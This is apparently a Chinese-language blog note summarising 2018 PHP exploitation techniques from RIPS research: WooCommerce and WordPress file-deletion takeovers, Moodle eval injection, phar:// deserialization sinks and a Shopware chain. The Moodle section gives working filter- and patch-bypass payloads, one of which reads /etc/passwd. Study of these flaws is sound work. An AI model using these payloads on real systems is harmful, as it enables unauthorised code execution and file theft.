2018最新PHP漏洞利用技巧
摘要:
本文學習了幾種新式的php exploit方法,在此做一筆記
檔案刪除漏洞, unlink()
Phar 反序列化, file*()
PHP物件例項化, ReflectionClass()
0x01 WordPress Design Flaw Leads to...
本文學習了幾種新式的php exploit方法,在此做一筆記
- 檔案刪除漏洞, unlink()
- Phar 反序列化, file*()
- PHP物件例項化, ReflectionClass()
0x01 WordPress Design Flaw Leads to WooCommerce RCE
WooCommerce 3.4.6本版本之前存在任意刪除漏洞,因為WordPress的設計缺陷將導致整站被接管。
設計缺陷:
- WooCommerce外掛被關閉之後edit_users許可權依舊存在
- 但是外掛的disallow_editing_of_admins過濾器不會再被觸發
- 一般只有administrators可以關閉外掛,(但是我們這裡有任意檔案刪除,相當於關閉了外掛)
參考:
ofollow,noindex">https://blog.ripstech.com/2018/wordpress-design-flaw-leads-to-woocommerce-rce/0x02 Moodle < 3.5.0
Code Injection
首先,教師角色是必須的(可以利用xss得到)
使用了eval函式
public function substitute_variables_and_eval($str, $dataset){
// substitues {x} and {y} for numbers like 1.2 with str_replace():
$formula = $this->substitute_variables($str, $dataset);
if ($error = qtype_calculated_find_formula_errors($formula)) {
return $error;// formula security mechanism
}
$str=null;
eval('$str = '.$formula.';');// dangerous eval()-call
return $str;
}
但是有過濾
function qtype_calculated_find_formula_errors($formula){
// Returns false if everything is alright
// otherwise it constructs an error message.
// Strip away dataset names.
while (preg_match('~\\{[[:alpha:]][^>} <{"\']*\\}~', $formula, $regs)){
$formula = str_replace($regs[0], '1', $formula);
}
// Strip away empty space and lowercase it.
$formula = strtolower(str_replace(' ', '', $formula));
$safeoperatorchar = '-+/*%>:^\~<?=&|!'; /* */
$operatorornumber = "[{$safeoperatorchar}.0-9eE]";
// [...]
if (preg_match("~[^{$safeoperatorchar}.0-9eE]+~", $formula, $regs)) {
return get_string('illegalformulasyntax','qtype_calculated',$regs[0]);
} else {
// Formula just might be valid.
return false;
}
}
bypass過濾
payload
1.{a.`$_GET[0]`}
2. /*{a*/`$_GET[0]`;//{x}}
=> 0=(date;cat/etc/passwd)>../hi.txt
bypass官方補丁
1.Blacklist
補丁說明:迴圈檢測輸入中是否存在//,/*,#
function qtype_calculated_find_formula_errors($formula){
foreach (['//', '/*', '#'] as $commentstart) {
if (strpos($formula, $commentstart) !== false) {
return get_string('illegalformulasyntax',
'qtype_calculated',
$commentstart);
}
}
payload
1?><?=log(1){a.`$_GET[0]`.({x})}?>
2.拒絕使用佔位符巢狀
public function find_dataset_names($text){
// Returns the possible dataset names found in the text as an array.
// The array has the dataset name for both key and value.
if (preg_match_all('~\\{([[:alpha:]][^>} <{"\']*)\\}~',$text,$regs)) {
$datasetnames = array_unique($regs[1]);
return array_combine($datasetnames, $datasetnames);
} else {
return [];
}
}
// [...]
function qtype_calculated_find_formula_errors($formula){
$datasetnames = find_dataset_names($formula);
foreach ($datasetnames as $datasetname) {
$formula = str_replace('{'.$datasetname.'}', '1', $formula);
}
payload
/*{x}{a*/`$_GET[0]`/*(1)//}{a*/`$_GET[0]`/*({x})//}*/
3.黑名單+線性替換
控制xml實現
參考:
https://blog.ripstech.com/2018/moodle-remote-code-execution/
0x03 WordPress File Delete to Code Execution
影響範圍: =<4.9.6
前提:擁有媒體檔案的刪除許可權(只能利用其它漏洞或者錯誤配置來取得)
刪除目標:
.htaccess 有時其中會包含一些安全策略(比如:訪問某些資料夾的許可權),刪除後會是安全策略無效。
index.php files 一般這個檔案是空的,主要是為了防止列目錄,被刪除了就有可能去列目錄了。
wp-config.php 這個刪除了,WordPress就要被重灌了。
參考: https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
0x04 Phar:// Deserialization
敏感點:
include('phar://test.phar');
file_get_contents('phar://test.phar');
file_put_contents('phar://test.phar', '');
copy('phar://test.phar', '');
include('phar://test.phar');
file_get_contents('phar://test.phar');
file_put_contents('phar://test.phar', '');
copy('phar://test.phar', '');
file_exists('phar://test.phar');
is_executable('phar://test.phar');
is_file('phar://test.phar');
is_dir('phar://test.phar');
is_link('phar://test.phar');
is_writable('phar://test.phar');
fileperms('phar://test.phar');
fileinode('phar://test.phar');
filesize('phar://test.phar');
fileowner('phar://test.phar');
filegroup('phar://test.phar'); fileatime('phar://test.phar');
filemtime('phar://test.phar');
filectime('phar://test.phar');
filetype('phar://test.phar');
getimagesize('phar://test.phar');
exif_read_data('phar://test.phar');
stat('phar://test.phar');
lstat('phar://test.phar');
touch('phar://test.phar‘);
md5_file('phar://test.phar');
可以參考:
https://blog.ripstech.com/2018/new-php-exploitation-technique/
http://seaii-blog.com/index.php/2018/08/23/86.html
https://www.anquanke.com/post/id/157657
https://www.anquanke.com/post/id/157439
0x05 Shopware < 5.3.4 PHP Object Instantiation to XXE to RCE
影響範圍:Shopware version <= 5.3.3 and >= 5.1
XSS→POI→XMLi→XXE→PHAR→POI→POP→RCE
突然發現有人翻譯過
https://www.freebuf.com/vuls/154415.html